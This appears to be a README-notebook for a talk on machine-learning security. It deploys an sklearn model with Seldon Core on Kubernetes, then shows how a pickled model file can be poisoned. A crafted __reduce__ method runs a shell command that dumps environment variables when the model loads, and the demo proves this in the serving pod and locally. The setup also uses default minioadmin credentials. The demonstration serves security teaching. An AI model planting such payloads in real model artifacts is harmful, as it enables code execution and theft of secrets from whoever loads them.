[![Maintenance](https://img.shields.io/badge/Maintained%3F-YES-green.svg)](https://github.com/EthicalML/awesome-production-machine-learning/graphs/commit-activity)
![GitHub](https://img.shields.io/badge/Release-PROD-yellow.svg)
![GitHub](https://img.shields.io/badge/Languages-MULTI-blue.svg)
![GitHub](https://img.shields.io/badge/License-MIT-lightgrey.svg)
[![GitHub](https://img.shields.io/twitter/follow/axsaucedo.svg?label=Follow)](https://twitter.com/AxSaucedo/)


<table>
<tr>
<td width="60%">
<h1>Flawed Machine Learning Security</h1>
</td>
<td>
<a href="https://youtu.be/dKjCWfuvYxQ?t=147"><img src="images/bosstown.gif"></a> <br> (AKA Exploring Secure ML)
</td>
</td>
</table>


## About this repo

This Repo contains a set of resources relevant to the talk "Secure Machine Learning at Scale with MLSecOps", and provides a set of examples to showcase practical common security flaws throughout the multiple phases of the machine learning lifecycle.


## Quick links

[TODO] Below are links to resources related to the talk, as well as references and relevant areas in machine learning security.

| | | |
|-|-|-|
|[🔍 High Level Frameworks & Principles](#high-level-frameworks-and-principles) |[🔏 Processes & Checklists](#processes-and-checklists) | [🔨 Interactive & Practical Tools](#interactive-and-practical-tools)|
|[📜 Industry standards initiatives](#industry-standards-initiatives)|[📚 Online Courses](#online-courses-and-learning-resources)|[🤖 Research and Industry Newsletters](#research-and-industry-newsletters)|
|[⚔ Regulation and Policy](#regulation-and-policy)|||

## Other relevant resources

<table>
  <tr>
    <td width="30%">
         You can join the <a href="https://ethical.institute/mle.html">Machine Learning Engineer</a> newsletter. You will receive updates on open source frameworks, tutorials and articles curated by machine learning professionals.
    </td>
    <td width="70%">
        <a href="https://ethical.institute/mle.html"><img src="images/mleng.png"></a>
    </td>
  </tr>
</table>

## Requirements

Requirements on CLIs
* kubectl
* istioctl
* mc (minio client)
* Kubernetes > 1.18
* Python 3.7

### Setup Kubernetes Cluster

#### Install and setup Istio

In [ ]:
!istioctl install -y

In [ ]:
%%bash
kubectl apply -n istio-system -f - << END
apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
  name: seldon-gateway
spec:
  selector:
    istio: ingressgateway # use istio default controller
  servers:
  - port:
      number: 80
      name: http
      protocol: HTTP
    hosts:
    - "*"
END

#### Setup Seldon Core

In [ ]:
%%bash
kubectl create ns seldon-system
helm upgrade --install \
    seldon-core seldon-core-operator \
    --repo https://storage.googleapis.com/seldon-charts  \
    --set usageMetrics.enabled=true --namespace seldon-system \
    --set istio.enabled="true" --set istio.gateway="seldon-gateway.istio-system.svc.cluster.local" \
    --version 1.13.1

#### Setup & configure MinIO

In [2]:
%%bash
kubectl create ns minio-system
helm repo add minio https://helm.min.io/
helm install minio minio/minio \
    --set accessKey=minioadmin \
    --set secretKey=minioadmin \
    --namespace minio-system

"minio" already exists with the same configuration, skipping
NAME: minio
LAST DEPLOYED: Sun Apr 10 13:24:52 2022
NAMESPACE: minio-system
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Minio can be accessed via port 9000 on the following DNS name from within your cluster:
minio.minio-system.svc.cluster.local

To access Minio from localhost, run the below commands:

  1. export POD_NAME=$(kubectl get pods --namespace minio-system -l "release=minio" -o jsonpath="{.items[0].metadata.name}")

  2. kubectl port-forward $POD_NAME 9000 --namespace minio-system

Read more about port forwarding here: http://kubernetes.io/docs/user-guide/kubectl/kubectl_port-forward/

You can now access Minio server on http://localhost:9000. Follow the below steps to connect to Minio server with mc client:

  1. Download the Minio mc client - https://docs.minio.io/docs/minio-client-quickstart-guide

  2. Get the ACCESS_KEY=$(kubectl get secret minio -o jsonpath="{.data.accesskey}" | base64 --decode) and the

Error from server (AlreadyExists): namespaces "minio-system" already exists


Once minio is runnning you need to open another terminal and run:
```
kubectl port-forward -n minio-system svc/minio 9000:9000
```

In [5]:
!mc config host add minio-seldon http://localhost:9000 minioadmin minioadmin

Added `minio-seldon` successfully.


In [35]:
!mc mb minio-seldon/fml-artifacts/ -p

Bucket created successfully `minio-seldon/fml-artifacts/`.


In [6]:
%%bash
kubectl apply -f - << END
apiVersion: v1
kind: Secret
metadata:
  name: seldon-init-container-secret
type: Opaque
stringData:
  RCLONE_CONFIG_S3_TYPE: s3
  RCLONE_CONFIG_S3_PROVIDER: minio
  RCLONE_CONFIG_S3_ACCESS_KEY_ID: minioadmin
  RCLONE_CONFIG_S3_SECRET_ACCESS_KEY: minioadmin
  RCLONE_CONFIG_S3_ENDPOINT: http://minio.minio-system.svc.cluster.local:9000
  RCLONE_CONFIG_S3_ENV_AUTH: "false"
END

secret/seldon-init-container-secret created


## Model Training Artifacts

#### Install requirements for model

In [7]:
%%writefile requirements.txt
seldon_core
scikit-learn == 0.24.2
numpy >= 1.8.2
joblib == 0.16.0

Writing requirements.txt


In [ ]:
!pip install -r requirements.txt

#### Import datasets to train Iris model

In [1]:
from sklearn import datasets

iris = datasets.load_iris()
X, y = iris.data, iris.target

#### Import simple LogsticRegression model

In [2]:
from sklearn.linear_model import LogisticRegression

model = LogisticRegression(solver="liblinear", multi_class='ovr')

#### Train model with dataset

In [3]:
model.fit(X, y)

LogisticRegression(multi_class='ovr', solver='liblinear')

#### Run prediction to test model

In [4]:
model.predict(X[:1])

array([0])

#### Dump model binary with pickle

In [5]:
!mkdir -p fml-artifacts/safe/

In [6]:
import joblib

joblib.dump(model, "fml-artifacts/safe/model.joblib")

['fml-artifacts/safe/model.joblib']

In [ ]:
!bat fml-artifacts/safe/model.joblib

#### Deploy the model

In [8]:
!mc cp -r fml-artifacts/ minio-seldon/fml-artifacts/

...el.joblib:  1.08 KiB / 1.08 KiB ┃▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓┃ 127.81 KiB/s 0s

In [38]:
%%bash
kubectl apply -f - << END
apiVersion: machinelearning.seldon.io/v1
kind: SeldonDeployment
metadata:
  name: model-safe
spec:
  predictors:
  - graph:
      implementation: SKLEARN_SERVER
      modelUri: s3://fml-artifacts/safe
      envSecretRefName: seldon-init-container-secret
      name: classifier
    name: default
END

seldondeployment.machinelearning.seldon.io/model-safe unchanged


In [9]:
!kubectl get pods

NAME                                              READY   STATUS    RESTARTS   AGE
model-safe-default-0-classifier-774975578-kt7bg   2/2     Running   0          33s


In [17]:
import requests

url = "http://localhost:80/seldon/default/model-safe/api/v1.0/predictions"
requests.post(url, json={"data": {"ndarray": [[1,2,3,4]]}}).json()

{'data': {'names': ['t:0', 't:1', 't:2'],
  'ndarray': [[0.0006985194531162835,
    0.00366803903943666,
    0.995633441507447]]},
 'meta': {'requestPath': {'classifier': 'seldonio/sklearnserver:1.14.0-dev'}}}

## Load Pickle and Inject Malicious Code

In [18]:
import joblib

model_safe = joblib.load("fml-artifacts/safe/model.joblib")

In [19]:
model_safe.predict(X[:1])

array([0])

In [49]:
import types, os

def __reduce__(self):
    cmd = "env > pwnd.txt" # E.g. base64.b64decode("ZW52ID4gcHduZC50eHQ=")
    return os.system, (cmd,)

In [38]:
model_safe.__class__.__reduce__ = types.MethodType(__reduce__, model_safe.__class__)

In [39]:
!mkdir -p fml-artifacts/unsafe/

In [40]:
joblib.dump(model_safe, "fml-artifacts/unsafe/model.joblib")

['fml-artifacts/unsafe/model.joblib']

In [ ]:
!bat fml-artifacts/unsafe/model.joblib

#### Deploy the model

In [41]:
!mc cp -r fml-artifacts/ minio-seldon/fml-artifacts/

...el.joblib:  1.05 KiB / 1.05 KiB ┃▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓┃ 115.81 KiB/s 0s

In [24]:
%%bash
kubectl apply -f - << END
apiVersion: machinelearning.seldon.io/v1
kind: SeldonDeployment
metadata:
  name: model-unsafe
spec:
  predictors:
  - graph:
      implementation: SKLEARN_SERVER
      modelUri: s3://fml-artifacts/unsafe
      envSecretRefName: seldon-init-container-secret
      name: classifier
    name: default
END

seldondeployment.machinelearning.seldon.io/model-unsafe created


In [26]:
!kubectl get pods

NAME                                                 READY   STATUS    RESTARTS   AGE
model-safe-default-0-classifier-774975578-kt7bg      2/2     Running   0          5m35s
model-unsafe-default-0-classifier-6c9699c8c9-rg24t   2/2     Running   0          2m27s


In [43]:
%%bash
UNSAFE_POD=$(kubectl get pod -l app=model-unsafe-default-0-classifier -o jsonpath="{.items[0].metadata.name}")
kubectl exec $UNSAFE_POD -c classifier -- head -5 pwnd.txt

SERVICE_TYPE=MODEL
LC_ALL=C.UTF-8
MODEL_UNSAFE_DEFAULT_SERVICE_PORT_GRPC=5001
MODEL_UNSAFE_DEFAULT_SERVICE_PORT_HTTP=8000
MODEL_SAFE_DEFAULT_PORT_5001_TCP_PROTO=tcp


#### Now reload the insecure pickle

In [45]:
!ls pwnd.txt

ls: cannot access 'pwnd.txt': No such file or directory


In [46]:
import joblib

model_unsafe = joblib.load("fml-artifacts/unsafe/model.joblib")

In [47]:
!head -4 pwnd.txt

CONDA_PROMPT_MODIFIER=(base) 
TMUX=/tmp/tmux-1000/default,97,0
PYSPARK_DRIVER_PYTHON=jupyter
USER=alejandro


#### Cleaning Deployed Services

In [48]:
!kubectl delete sdep model-safe model-unsafe 

seldondeployment.machinelearning.seldon.io "model-safe" deleted
seldondeployment.machinelearning.seldon.io "model-unsafe" deleted
